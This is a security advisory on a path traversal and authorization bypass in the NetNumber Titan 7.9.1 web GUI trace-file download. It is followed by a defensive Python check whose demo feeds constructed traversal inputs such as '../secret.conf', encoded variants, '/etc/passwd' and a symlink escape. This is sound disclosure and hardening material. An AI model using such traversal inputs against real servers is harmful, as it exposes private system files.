vendor: Titan Master
by: MobileNetworkSecurity
CVSS: 7.5 (HIGH)
CWE: 22 (Path Traversal)
Product Name: Titan Master
Affected Version From: 7.9.1
Affected Version To: 7.9.1
Patch Exists: YES
Related CWE: N/A
CPE: a:netnumber:titan_master
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2019
NetNumber Titan ENUM/DNS/NP – Path Traversal – Authorization Bypass
A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1. When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the web server runs with elevated privileges, it is possible to download arbitrary files. The HTTP request can be executed by any user, even a low-privileged one, so the authorization mechanism can be bypassed.
Mitigation:
Upgrade to the latest version of the software.
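
A server-side check of the kind that closes this class of bug in a trace-download handler, as an added example that is not NetNumber's code or part of the original advisory. The function name, role names and directory layout are assumptions, and the sample requests are constructed.

```python
import os
import tempfile
from urllib.parse import unquote

class DownloadDenied(Exception):
    """Raised when a trace download request must be refused."""

def resolve_trace_path(trace_root, name, user_roles, required_role="trace-download"):
    """Return the real path of a trace file, or raise DownloadDenied."""
    # Authorization is checked server-side on every request, not only in the GUI.
    if required_role not in user_roles:
        raise DownloadDenied("role not permitted")
    for _ in range(4):  # undo nested URL encoding such as %252e%252e%252f
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    else:
        raise DownloadDenied("excessive URL encoding")
    if "\x00" in name or "\\" in name:
        raise DownloadDenied("illegal character")
    # realpath collapses ../ and follows symlinks before the containment test.
    root = os.path.realpath(trace_root)
    candidate = os.path.realpath(os.path.join(root, name))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise DownloadDenied("outside trace directory")
    if not os.path.isfile(candidate):
        raise DownloadDenied("no such trace file")
    return candidate

def demo():
    """Run constructed requests against a throwaway directory tree."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "traces")
    os.mkdir(root)
    for path in (os.path.join(root, "trace1.log"), os.path.join(base, "secret.conf")):
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    os.symlink(os.path.join(base, "secret.conf"), os.path.join(root, "link.log"))
    ok, low = {"trace-download"}, {"read-only"}  # hypothetical role names
    cases = [("trace1.log", ok), ("../secret.conf", ok), ("%2e%2e%2fsecret.conf", ok),
             ("%252e%252e%252fsecret.conf", ok), ("/etc/passwd", ok),
             ("link.log", ok), ("trace1.log", low)]
    results = []
    for name, roles in cases:
        try:
            results.append(os.path.basename(resolve_trace_path(root, name, roles)))
        except DownloadDenied as exc:
            results.append("denied: %s" % exc)
    return results
```

Running the web server process under an unprivileged account limits what such a request can reach even if a check like this is missing.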